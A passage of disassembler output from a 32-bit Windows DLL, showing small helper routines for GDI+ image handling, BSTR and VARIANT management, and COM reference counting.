mov ecx, [ebp+var_4]
push ecx
call sub_1000D1F0
add esp, 4
loc_1000D1E5: ; CODE XREF: sub_1000D1C0+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_1000D1C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D1F0 proc near ; CODE XREF: sub_1000D1C0+1D�p
; sub_1000D3A0+1D�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push eax
call j_GdipFree_thunk
pop ebp
retn
sub_1000D1F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D200 proc near ; DATA XREF: .rdata:1001E454�o
; .rdata:1001E45C�o
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_1000D200
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
mov [ebp+var_1C], ecx
mov [ebp+var_10], 0
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_1C]
mov edx, [ecx+4]
push edx
call j_GdipCloneImage_thunk
push eax
mov ecx, [ebp+var_1C]
call sub_1000D150
push 10h
call sub_1000D2A0
add esp, 4
mov [ebp+var_18], eax
mov [ebp+var_4], 0
cmp [ebp+var_18], 0
jz short loc_1000D270
mov eax, [ebp+var_1C]
mov ecx, [eax+8]
push ecx
mov edx, [ebp+var_10]
push edx
mov ecx, [ebp+var_18]
call sub_1000D2B0
mov [ebp+var_20], eax
jmp short loc_1000D277
; ---------------------------------------------------------------------------
loc_1000D270: ; CODE XREF: sub_1000D200+56�j
mov [ebp+var_20], 0
loc_1000D277: ; CODE XREF: sub_1000D200+6E�j
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_14]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_1000D200 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D2A0 proc near ; CODE XREF: sub_1000D200+40�p
; sub_1000D410+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push eax
call j_GdipAlloc_thunk
pop ebp
retn
sub_1000D2A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D2B0 proc near ; CODE XREF: sub_1000D200+66�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_1001E450
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_4]
call sub_1000D2E0
mov edx, [ebp+var_4]
mov eax, [ebp+arg_4]
mov [edx+8], eax
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 8
sub_1000D2B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D2E0 proc near ; CODE XREF: sub_1000D2B0+17�p
; strstreambuf::strstreambuf(char *,int,char *)+5B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax+4], ecx
mov esp, ebp
pop ebp
retn 4
sub_1000D2E0 endp
; ---------------------------------------------------------------------------
align 10h
; [0000007A BYTES: COLLAPSED FUNCTION strstreambuf::strstreambuf(char *,int,char *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION sub_1000D380. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002E BYTES: COLLAPSED FUNCTION sub_1000D3A0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION sub_1000D3D0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D410 proc near ; CODE XREF: sub_1000D3D0+29�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_1000D410
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
mov [ebp+var_20], ecx
mov [ebp+var_10], 0
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_20]
mov edx, [ecx+4]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call j_GdipCloneBitmapAreaI_thunk
mov edx, [ebp+var_20]
mov [edx+8], eax
mov eax, [ebp+var_20]
cmp dword ptr [eax+8], 0
jnz short loc_1000D4C1
push 10h
call sub_1000D2A0
add esp, 4
mov [ebp+var_1C], eax
mov [ebp+var_4], 0
cmp [ebp+var_1C], 0
jz short loc_1000D493
mov ecx, [ebp+var_10]
push ecx
mov ecx, [ebp+var_1C]
call ??0strstreambuf@std@@QAE@PADH0@Z ; std::strstreambuf::strstreambuf(char *,int,char *)
mov [ebp+var_24], eax
jmp short loc_1000D49A
; ---------------------------------------------------------------------------
loc_1000D493: ; CODE XREF: sub_1000D410+70�j
mov [ebp+var_24], 0
loc_1000D49A: ; CODE XREF: sub_1000D410+81�j
mov edx, [ebp+var_24]
mov [ebp+var_18], edx
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_18]
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_1000D4BC
mov ecx, [ebp+var_10]
push ecx
call j_GdipDisposeImage_thunk
loc_1000D4BC: ; CODE XREF: sub_1000D410+A1�j
mov eax, [ebp+var_14]
jmp short loc_1000D4C3
; ---------------------------------------------------------------------------
loc_1000D4C1: ; CODE XREF: sub_1000D410+56�j
xor eax, eax
loc_1000D4C3: ; CODE XREF: sub_1000D410+AF�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 14h
sub_1000D410 endp
; ---------------------------------------------------------------------------
align 10h
; [00000064 BYTES: COLLAPSED FUNCTION std::strstreambuf::strstreambuf(char *,int,char *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D550 proc near ; CODE XREF: TimerFunc+F7�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov al, [eax+4]
mov esp, ebp
pop ebp
retn
sub_1000D550 endp
; ---------------------------------------------------------------------------
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION std::_Container_base::_Container_base(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008A BYTES: COLLAPSED FUNCTION std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int). PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D620 proc near ; CODE XREF: sub_10003786+387�p
; sub_10003786+3C0�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_1000D700
mov esp, ebp
pop ebp
retn
sub_1000D620 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D640 proc near ; CODE XREF: sub_10003786+37C�p
; sub_10003786+3B5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+arg_0]
call sub_1000D6E0
mov ecx, [ebp+var_4]
call sub_1000D700
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [eax], edx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_1000D640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D670 proc near ; CODE XREF: sub_10003786+8B1�p
; sub_10003786+91F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_1000D690
mov ecx, [ebp+var_4]
mov ecx, [ecx]
call sub_1000D870
mov [ebp+var_8], eax
jmp short loc_1000D697
; ---------------------------------------------------------------------------
loc_1000D690: ; CODE XREF: sub_1000D670+F�j
mov [ebp+var_8], 0
loc_1000D697: ; CODE XREF: sub_1000D670+1E�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_1000D670 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D6A0 proc near ; CODE XREF: sub_10003786+4CC�p
; sub_10003786+50A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_1000D730
neg eax
sbb eax, eax
inc eax
mov esp, ebp
pop ebp
retn 4
sub_1000D6A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D6C0 proc near ; CODE XREF: sub_10003786+848�p
; sub_10003786+886�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_1000D730
neg eax
sbb eax, eax
neg eax
mov esp, ebp
pop ebp
retn 4
sub_1000D6C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D6E0 proc near ; CODE XREF: sub_1000D640+A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_1000D6F9
mov ecx, [ebp+var_4]
mov ecx, [ecx]
call sub_1000D7D0
loc_1000D6F9: ; CODE XREF: sub_1000D6E0+D�j
mov esp, ebp
pop ebp
retn
sub_1000D6E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D700 proc near ; CODE XREF: sub_1000D620+A�p
; sub_1000D640+12�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_1000D722
mov ecx, [ebp+var_4]
mov ecx, [ecx]
call sub_1000D7F0
mov edx, [ebp+var_4]
mov dword ptr [edx], 0
loc_1000D722: ; CODE XREF: sub_1000D700+D�j
mov esp, ebp
pop ebp
retn
sub_1000D700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D730 proc near ; CODE XREF: sub_1000D6A0+E�p
; sub_1000D6C0+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov edx, [eax]
cmp edx, [ecx]
jnz short loc_1000D747
xor eax, eax
jmp short loc_1000D773
; ---------------------------------------------------------------------------
loc_1000D747: ; CODE XREF: sub_1000D730+11�j
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jnz short loc_1000D754
or eax, 0FFFFFFFFh
jmp short loc_1000D773
; ---------------------------------------------------------------------------
loc_1000D754: ; CODE XREF: sub_1000D730+1D�j
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx], 0
jnz short loc_1000D763
mov eax, 1
jmp short loc_1000D773
; ---------------------------------------------------------------------------
loc_1000D763: ; CODE XREF: sub_1000D730+2A�j
mov edx, [ebp+arg_0]
mov eax, [edx]
push eax
mov ecx, [ebp+var_4]
mov ecx, [ecx]
call sub_1000D8C0
loc_1000D773: ; CODE XREF: sub_1000D730+15�j
; sub_1000D730+22�j ...
mov esp, ebp
pop ebp
retn 4
sub_1000D730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1000D780(LPCSTR lpMultiByteStr)
sub_1000D780 proc near ; CODE XREF: std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)+3F�p
var_4 = dword ptr -4
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+8], 1
mov edx, [ebp+lpMultiByteStr]
push edx ; lpMultiByteStr
call sub_1001C99D
mov ecx, [ebp+var_4]
mov [ecx], eax
mov edx, [ebp+var_4]
cmp dword ptr [edx], 0
jnz short loc_1000D7C1
cmp [ebp+lpMultiByteStr], 0
jz short loc_1000D7C1
push 8007000Eh
call sub_1001C8F0
loc_1000D7C1: ; CODE XREF: sub_1000D780+2F�j
; sub_1000D780+35�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_1000D780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D7D0 proc near ; CODE XREF: sub_1000D6E0+14�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
add eax, 8
push eax ; lpAddend
call ds:InterlockedIncrement ; InterlockedIncrement
mov ecx, [ebp+var_4]
mov eax, [ecx+8]
mov esp, ebp
pop ebp
retn
sub_1000D7D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D7F0 proc near ; CODE XREF: sub_1000D700+14�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
add eax, 8
push eax ; lpAddend
call ds:InterlockedDecrement ; InterlockedDecrement
test eax, eax
jnz short loc_1000D836
mov ecx, [ebp+var_C]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jz short loc_1000D82B
push 1
mov ecx, [ebp+var_4]
call sub_1000D840
mov [ebp+var_10], eax
jmp short loc_1000D832
; ---------------------------------------------------------------------------
loc_1000D82B: ; CODE XREF: sub_1000D7F0+2A�j
mov [ebp+var_10], 0
loc_1000D832: ; CODE XREF: sub_1000D7F0+39�j
xor eax, eax
jmp short loc_1000D83C
; ---------------------------------------------------------------------------
loc_1000D836: ; CODE XREF: sub_1000D7F0+18�j
mov eax, [ebp+var_C]
mov eax, [eax+8]
loc_1000D83C: ; CODE XREF: sub_1000D7F0+44�j
mov esp, ebp
pop ebp
retn
sub_1000D7F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D840 proc near ; CODE XREF: sub_1000D7F0+31�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_1000D9B0
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_1000D865
mov ecx, [ebp+var_4]
push ecx ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
add esp, 4
loc_1000D865: ; CODE XREF: sub_1000D840+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_1000D840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D870 proc near ; CODE XREF: sub_1000D670+16�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 0
jnz short loc_1000D8AC
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx ; lpWideCharStr
call sub_1001CA12
mov ecx, [ebp+var_4]
mov [ecx+4], eax
mov edx, [ebp+var_4]
cmp dword ptr [edx+4], 0
jnz short loc_1000D8AC
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_1000D8AC
push 8007000Eh
call sub_1001C8F0
loc_1000D8AC: ; CODE XREF: sub_1000D870+E�j
; sub_1000D870+28�j ...
mov ecx, [ebp+var_4]
mov eax, [ecx+4]
mov esp, ebp
pop ebp
retn
sub_1000D870 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D8C0 proc near ; CODE XREF: sub_1000D730+3E�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_18], ecx
mov eax, [ebp+var_18]
cmp dword ptr [eax], 0
jnz short loc_1000D8DF
mov ecx, [ebp+arg_0]
mov eax, [ecx]
neg eax
sbb eax, eax
jmp loc_1000D9A5
; ---------------------------------------------------------------------------
loc_1000D8DF: ; CODE XREF: sub_1000D8C0+F�j
mov edx, [ebp+arg_0]
cmp dword ptr [edx], 0
jnz short loc_1000D8F1
mov eax, 1
jmp loc_1000D9A5
; ---------------------------------------------------------------------------
loc_1000D8F1: ; CODE XREF: sub_1000D8C0+25�j
mov eax, [ebp+var_18]
mov ecx, [eax]
push ecx ; BSTR
call ds:SysStringLen
mov [ebp+var_C], eax
mov edx, [ebp+arg_0]
mov eax, [edx]
push eax ; BSTR
call ds:SysStringLen
mov [ebp+var_10], eax
mov ecx, [ebp+var_C]
mov [ebp+var_14], ecx
mov edx, [ebp+var_14]
cmp edx, [ebp+var_10]
jbe short loc_1000D923
mov eax, [ebp+var_10]
mov [ebp+var_14], eax
loc_1000D923: ; CODE XREF: sub_1000D8C0+5B�j
mov ecx, [ebp+var_18]
mov edx, [ecx]
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov [ebp+var_8], ecx
loc_1000D933: ; CODE XREF: sub_1000D8C0:loc_1000D981�j
mov edx, [ebp+var_14]
mov eax, [ebp+var_14]
sub eax, 1
mov [ebp+var_14], eax
test edx, edx
jbe short loc_1000D983
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx]
mov eax, [ebp+var_8]
xor ecx, ecx
mov cx, [eax]
mov eax, [ebp+var_8]
add eax, 2
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
add eax, 2
mov [ebp+var_4], eax
cmp edx, ecx
jz short loc_1000D981
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx-2]
mov eax, edx
mov ecx, [ebp+var_8]
xor edx, edx
mov dx, [ecx-2]
sub eax, edx
jmp short loc_1000D9A5
; ---------------------------------------------------------------------------
loc_1000D981: ; CODE XREF: sub_1000D8C0+A7�j
jmp short loc_1000D933
; ---------------------------------------------------------------------------
loc_1000D983: ; CODE XREF: sub_1000D8C0+81�j
mov eax, [ebp+var_C]
cmp eax, [ebp+var_10]
jnb short loc_1000D994
mov [ebp+var_1C], 0FFFFFFFFh
jmp short loc_1000D9A2
; ---------------------------------------------------------------------------
loc_1000D994: ; CODE XREF: sub_1000D8C0+C9�j
mov ecx, [ebp+var_C]
xor edx, edx
cmp ecx, [ebp+var_10]
setnz dl
mov [ebp+var_1C], edx
loc_1000D9A2: ; CODE XREF: sub_1000D8C0+D2�j
mov eax, [ebp+var_1C]
loc_1000D9A5: ; CODE XREF: sub_1000D8C0+1A�j
; sub_1000D8C0+2C�j ...
mov esp, ebp
pop ebp
retn 4
sub_1000D8C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D9B0 proc near ; CODE XREF: sub_1000D840+A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_1000D9D0
mov esp, ebp
pop ebp
retn
sub_1000D9B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D9D0 proc near ; CODE XREF: sub_1000D9B0+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
cmp dword ptr [eax], 0
jz short loc_1000D9ED
mov ecx, [ebp+var_8]
mov edx, [ecx]
push edx ; bstrString
call ds:SysFreeString
loc_1000D9ED: ; CODE XREF: sub_1000D9D0+F�j
mov eax, [ebp+var_8]
cmp dword ptr [eax+4], 0
jz short loc_1000DA0B
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
push eax ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
add esp, 4
loc_1000DA0B: ; CODE XREF: sub_1000D9D0+24�j
mov esp, ebp
pop ebp
retn
sub_1000D9D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1000DA10(VARIANTARG *pvargSrc)
sub_1000DA10 proc near ; CODE XREF: sub_10003786+264�p
; sub_10003786+29F�p
pvargDest = dword ptr -4
pvargSrc = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+pvargDest], ecx
mov eax, [ebp+pvargDest]
push eax ; pvarg
call ds:VariantInit
mov ecx, [ebp+pvargSrc]
push ecx ; pvargSrc
mov edx, [ebp+pvargDest]
push edx ; pvargDest
call ds:VariantCopy
push eax
call sub_1000DA50
add esp, 4
mov eax, [ebp+pvargDest]
mov esp, ebp
pop ebp
retn 4
sub_1000DA10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DA50 proc near ; CODE XREF: sub_1000DA10+20�p
; sub_1000DA70+12�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jge short loc_1000DA62
mov eax, [ebp+arg_0]
push eax
call sub_1001C8F0
loc_1000DA62: ; CODE XREF: sub_1000DA50+7�j
pop ebp
retn
sub_1000DA50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DA70 proc near ; CODE XREF: sub_10003786+2F1�p
; sub_10003786+30F�p ...
pvarg = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+pvarg], ecx
mov eax, [ebp+pvarg]
push eax ; pvarg
call ds:VariantClear
push eax
call sub_1000DA50
add esp, 4
mov esp, ebp
pop ebp
retn
sub_1000DA70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DA90 proc near ; CODE XREF: sub_10003786+300�p
; sub_10003786+31E�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_1000DAE0
mov esp, ebp
pop ebp
retn
sub_1000DA90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DAB0 proc near ; CODE XREF: sub_10003786+23C�p
; sub_10003786+277�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov word ptr [eax], 3
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [ecx+8], edx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_1000DAB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DAE0 proc near ; CODE XREF: sub_1000DA90+A�p
pvarg = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+pvarg], ecx
mov eax, [ebp+pvarg]
push eax ; pvarg
call ds:VariantClear
mov esp, ebp
pop ebp
retn
sub_1000DAE0 endp
; ---------------------------------------------------------------------------
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION std::_Container_base::_Container_base(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DB20 proc near ; CODE XREF: sub_10003786+367�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
psz = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_C], 0
lea eax, [ebp+psz]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov eax, [ebp+var_10]
push eax
call dword ptr [edx+2Ch]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000DB5B
push offset dword_10023378
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000DB5B: ; CODE XREF: sub_1000DB20+27�j
push 0 ; char
mov eax, [ebp+psz]
push eax ; psz
mov ecx, [ebp+arg_0]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z_0 ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov ecx, [ebp+var_C]
or ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 4
sub_1000DB20 endp
; ---------------------------------------------------------------------------
align 10h
; [0000008E BYTES: COLLAPSED FUNCTION std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int). PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1000DC10(BSTR psz, int)
sub_1000DC10 proc near ; CODE XREF: std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)+43�p
var_4 = dword ptr -4
psz = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+8], 1
mov edx, [ebp+arg_4]
and edx, 0FFh
test edx, edx
jz short loc_1000DC6C
cmp [ebp+psz], 0
jz short loc_1000DC6C
mov eax, [ebp+psz]
push eax ; bstr
call ds:SysStringByteLen
push eax ; len
mov ecx, [ebp+psz]
push ecx ; psz
call ds:SysAllocStringByteLen
mov edx, [ebp+var_4]
mov [edx], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jnz short loc_1000DC6A
push 8007000Eh
call sub_1001C8F0
loc_1000DC6A: ; CODE XREF: sub_1000DC10+4E�j
jmp short loc_1000DC74
; ---------------------------------------------------------------------------
loc_1000DC6C: ; CODE XREF: sub_1000DC10+26�j
; sub_1000DC10+2C�j
mov ecx, [ebp+var_4]
mov edx, [ebp+psz]
mov [ecx], edx
loc_1000DC74: ; CODE XREF: sub_1000DC10:loc_1000DC6A�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 8
sub_1000DC10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DC80 proc near ; CODE XREF: sub_10003786+3A0�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
psz = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_C], 0
lea eax, [ebp+psz]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov eax, [ebp+var_10]
push eax
call dword ptr [edx+34h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000DCBB
push offset dword_10023378
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000DCBB: ; CODE XREF: sub_1000DC80+27�j
push 0 ; char
mov eax, [ebp+psz]
push eax ; psz
mov ecx, [ebp+arg_0]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z_0 ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov ecx, [ebp+var_C]
or ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 4
sub_1000DC80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DCE0 proc near ; CODE XREF: sub_10003786+C8A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
